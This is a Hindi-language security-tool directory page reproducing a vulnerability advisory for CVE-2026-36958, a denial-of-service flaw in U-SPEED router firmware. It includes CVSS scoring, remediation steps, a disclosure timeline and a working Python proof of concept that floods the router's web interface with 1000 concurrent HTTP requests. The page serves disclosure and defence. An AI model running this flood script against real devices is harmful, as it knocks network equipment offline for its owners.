Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-36958 — CVE-2026-36958 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, U-SPEED राउटर फर्मवेयर में एक डिनायल-ऑफ-सर्विस भेद्यता जो समवर्ती HTTP अनुरोधों के माध्यम से संसाधनों को समाप्त कर देती है, जिससे वेब इंटरफ़ेस अनुत्तरदायी हो जाता है। | Kitploit
उपकरण/GitHubGitHub/kirubel-cve/cve-2026-36958
भेद्यता विश्लेषणशोषणवेब सुरक्षानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHubkirubel-cve/cve-2026-36958

CVE-2026-36958

CVE-2026-36958 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, U-SPEED राउटर फर्मवेयर में एक डिनायल-ऑफ-सर्विस भेद्यता जो समवर्ती HTTP अनुरोधों के माध्यम से संसाधनों को समाप्त कर देती है, जिससे वेब इंटरफ़ेस अनुत्तरदायी हो जाता है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-36958: समवर्ती HTTP अनुरोधों के माध्यम से सेवा से वंचित (Denial of Service)

CVE ID: CVE-2026-36958 दिनांक: 2026-04-29 खोजकर्ता: Kirubel Solomne विक्रेता: U-SPEED उत्पाद: U-SPEED राउटर फर्मवेयर संस्करण: V1.0.0 CWE: CWE-400 - अनियंत्रित संसाधन खपत


विवरण

U-SPEED राउटर फर्मवेयर V1.0.0 सेवा से वंचित (Denial of Service) की भेद्यता से ग्रस्त है। वेब प्रबंधन इंटरफ़ेस पर यादृच्छिक या गैर-मौजूद एंडपॉइंट्स पर बड़ी संख्या में समवर्ती HTTP अनुरोध भेजकर, एक हमलावर एम्बेडेड Boa HTTP सर्वर में सिस्टम संसाधनों को समाप्त कर सकता है। इससे राउटर का वेब इंटरफ़ेस अनुत्तरदायी हो जाता है और सामान्य संचालन बहाल करने के लिए मैन्युअल रीबूट की आवश्यकता हो सकती है।


CVSS स्कोर

CVSS v3.1 स्कोर: 7.5 (उच्च) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

मीट्रिकमान
हमला वेक्टरनेटवर्क
हमला जटिलतानिम्न
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं
गोपनीयता प्रभावकोई नहीं
अखंडता प्रभावकोई नहीं
उपलब्धता प्रभावउच्च

प्रमाण की अवधारणा (Proof of Concept)

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router web interface is still responsive.")

अपेक्षित व्यवहार: सर्वर को समवर्ती कनेक्शनों को सुचारू रूप से संभालना चाहिए। वास्तविक व्यवहार: वेब इंटरफ़ेस अनुत्तरदायी हो जाता है; मैन्युअल रीबूट आवश्यक है।


प्रभाव

  • वेब प्रबंधन इंटरफ़ेस अनुपलब्ध हो जाता है
  • रूटिंग सेवाओं में संभावित व्यवधान
  • कार्यक्षमता बहाल करने के लिए मैन्युअल रीबूट की आवश्यकता होती है

उपचार (Remediation)

  • Boa वेब सर्वर पर कनेक्शन दर सीमित करना (rate limiting) लागू करें
  • प्रति स्रोत IP अधिकतम समवर्ती कनेक्शन सीमित करें
  • स्वचालित पुनर्प्राप्ति/वॉचडॉग तंत्र जोड़ें

प्रकटीकरण समयरेखा

दिनांकघटना
2026-04-29भेद्यता की खोज की गई
2026-04-29MITRE को रिपोर्ट किया गया
2026-04-29CVE-2026-36958 निर्दिष्ट किया गया
2026-04-29सार्वजनिक प्रकटीकरण

संदर्भ

  • MITRE CVE-2026-36958
  • CWE-400
  • विक्रेता वेबसाइट
टूल डाउनलोड करें